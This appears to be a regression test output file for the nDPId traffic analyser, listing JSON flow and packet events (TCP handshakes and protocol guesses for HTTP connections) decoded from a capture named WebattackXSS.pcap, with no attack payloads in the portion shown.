-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":215,"flow_packet_id":2,"flow_last_seen":1499347334667,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347334667,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2xqx52s8sbTgp6AScSBhyAAAAgQFtAQCCAoD5B\/EATpOTgEDAwc="} 
-00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3054,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":215,"flow_packet_id":3,"flow_last_seen":1499347334668,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347334668,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0rulAAD4GFu+sEAABwKgKMtsaAFCxtOCnsedrPYAQAOUA0AAAAQEICgE6Tk4D5B\/E"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3070,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347337226,"flow_last_seen":1499347337226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347337226,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56116,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3070,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":216,"flow_packet_id":1,"flow_last_seen":1499347337226,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347337226,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8TYVAAD4GeEusEAABwKgKMts0AFCRRx1LAAAAAKACchCC5AAAAgQFtAQCCAoBOlDOAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3071,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":216,"flow_packet_id":2,"flow_last_seen":1499347337226,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347337226,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2zQKH2urkUcdTKAScSDn0AAAAgQFtAQCCAoD5CJEATpQzgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3072,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":216,"flow_packet_id":3,"flow_last_seen":1499347337227,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347337227,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0TYZAAD4GeFKsEAABwKgKMts0AFCRRx1MCh9rrIAQAOWG2AAAAQEICgE6UM4D5CJE"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3082,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347338485,"flow_last_seen":1499347338485,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347338485,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56130,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3082,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":217,"flow_packet_id":1,"flow_last_seen":1499347338485,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347338485,"pkt":"ABm5CmnxAMGxFOsxCABFAAA871JAAD4G1n2sEAABwKgKMttCAFArWL1bAAAAAKACchBHegAAAgQFtAQCCAoBOlIJAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3083,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":217,"flow_packet_id":2,"flow_last_seen":1499347338485,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347338485,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ20LSM68cK1i9XKAScSCfpgAAAgQFtAQCCAoD5CN+ATpSCQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3084,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":217,"flow_packet_id":3,"flow_last_seen":1499347338486,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347338486,"pkt":"ABm5CmnxAMGxFOsxCABFAAA071NAAD4G1oSsEAABwKgKMttCAFArWL1c0jOvHYAQAOU+rgAAAQEICgE6UgkD5CN+"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3097,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347339782,"flow_last_seen":1499347339782,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347339782,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56144,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3097,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":218,"flow_packet_id":1,"flow_last_seen":1499347339782,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347339782,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8e9RAAD4GSfysEAABwKgKMttQAFCK9SiZAAAAAKACchB7TQAAAgQFtAQCCAoBOlNNAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3098,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":218,"flow_packet_id":2,"flow_last_seen":1499347339782,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347339782,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ21AZ1nzCivUomqAScSC87AAAAgQFtAQCCAoD5CTDATpTTQEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3099,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":218,"flow_packet_id":3,"flow_last_seen":1499347339783,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347339783,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0e9VAAD4GSgOsEAABwKgKMttQAFCK9SiaGdZ8w4AQAOVb9AAAAQEICgE6U00D5CTD"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3106,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347341106,"flow_last_seen":1499347341106,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347341106,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56158,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3106,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":219,"flow_packet_id":1,"flow_last_seen":1499347341106,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347341106,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8aWRAAD4GXGysEAABwKgKMtteAFBkzD38AAAAAKACchCKugAAAgQFtAQCCAoBOlSYAAAAAAEDAwc="} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3107,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":219,"flow_packet_id":2,"flow_last_seen":1499347341106,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347341106,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ217gSFdsZMw9\/aAScSAp8gAAAgQFtAQCCAoD5CYOATpUmAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3108,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":219,"flow_packet_id":3,"flow_last_seen":1499347341107,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347341107,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0aWVAAD4GXHOsEAABwKgKMtteAFBkzD394EhXbYAQAOXI+QAAAQEICgE6VJgD5CYO"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3115,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347342386,"flow_last_seen":1499347342386,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347342386,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56172,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3115,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":220,"flow_packet_id":1,"flow_last_seen":1499347342386,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347342386,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8DyJAAD4Gtq6sEAABwKgKMttsAFDfC1r6AAAAAKACchDyLgAAAgQFtAQCCAoBOlXYAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3116,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":220,"flow_packet_id":2,"flow_last_seen":1499347342386,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347342386,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ22zAs3dz3wta+6AScSCPtAAAAgQFtAQCCAoD5CdOATpV2AEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3117,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":220,"flow_packet_id":3,"flow_last_seen":1499347342387,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347342387,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0DyNAAD4GtrWsEAABwKgKMttsAFDfC1r7wLN3dIAQAOUuvAAAAQEICgE6VdgD5CdO"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3127,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347343672,"flow_last_seen":1499347343672,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347343672,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56186,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3127,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":221,"flow_packet_id":1,"flow_last_seen":1499347343672,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347343672,"pkt":"ABm5CmnxAMGxFOsxCABFAAA83PZAAD4G6NmsEAABwKgKMtt6AFBC4YvvAAAAAKACchBcFQAAAgQFtAQCCAoBOlcZAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3128,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":221,"flow_packet_id":2,"flow_last_seen":1499347343672,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347343672,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ23pctqnYQuGL8KAScSAp8gAAAgQFtAQCCAoD5CiPATpXGQEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3129,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":221,"flow_packet_id":3,"flow_last_seen":1499347343673,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347343673,"pkt":"ABm5CmnxAMGxFOsxCABFAAA03PdAAD4G6OCsEAABwKgKMtt6AFBC4YvwXLap2YAQAOXI+AAAAQEICgE6VxoD5CiP"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347219208,"flow_last_seen":1499347224678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347343711,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54862,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347219208,"flow_last_seen":1499347224678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347343711,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54862,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347220447,"flow_last_seen":1499347225677,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347343711,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54876,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347220447,"flow_last_seen":1499347225677,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347343711,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54876,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347221694,"flow_last_seen":1499347227677,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347343711,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54890,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347221694,"flow_last_seen":1499347227677,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347343711,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54890,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347224338,"flow_last_seen":1499347229678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347343711,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54916,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347224338,"flow_last_seen":1499347229678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347343711,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54916,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347215361,"flow_last_seen":1499347220676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347343711,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54822,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347215361,"flow_last_seen":1499347220676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347343711,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54822,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347216659,"flow_last_seen":1499347221677,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347343711,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54836,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347216659,"flow_last_seen":1499347221677,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347343711,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54836,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3149,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347346211,"flow_last_seen":1499347346211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347346211,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56212,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3149,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":222,"flow_packet_id":1,"flow_last_seen":1499347346211,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347346211,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ZYhAAD4GYEisEAABwKgKMtuUAFCjBDwcAAAAAKACchBJMAAAAgQFtAQCCAoBOlmUAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3150,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":222,"flow_packet_id":2,"flow_last_seen":1499347346211,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347346211,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ25SXkk2howQ8HaAScSA17QAAAgQFtAQCCAoD5CsKATpZlAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3151,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":222,"flow_packet_id":3,"flow_last_seen":1499347346211,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347346211,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ZYlAAD4GYE+sEAABwKgKMtuUAFCjBDwdl5JNooAQAOXU9AAAAQEICgE6WZQD5CsK"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3160,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347347483,"flow_last_seen":1499347347483,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347347483,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56226,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3160,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":223,"flow_packet_id":1,"flow_last_seen":1499347347483,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347347483,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8D8lAAD4GtgesEAABwKgKMtuiAFCZ3FUbAAAAAKACchA4DQAAAgQFtAQCCAoBOlrSAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3161,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":223,"flow_packet_id":2,"flow_last_seen":1499347347483,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347347483,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ26Ji05dMmdxVHKAScSAOoAAAAgQFtAQCCAoD5CxIATpa0gEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3162,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":223,"flow_packet_id":3,"flow_last_seen":1499347347484,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347347484,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0D8pAAD4Gtg6sEAABwKgKMtuiAFCZ3FUcYtOXTYAQAOWtpwAAAQEICgE6WtID5CxI"} 
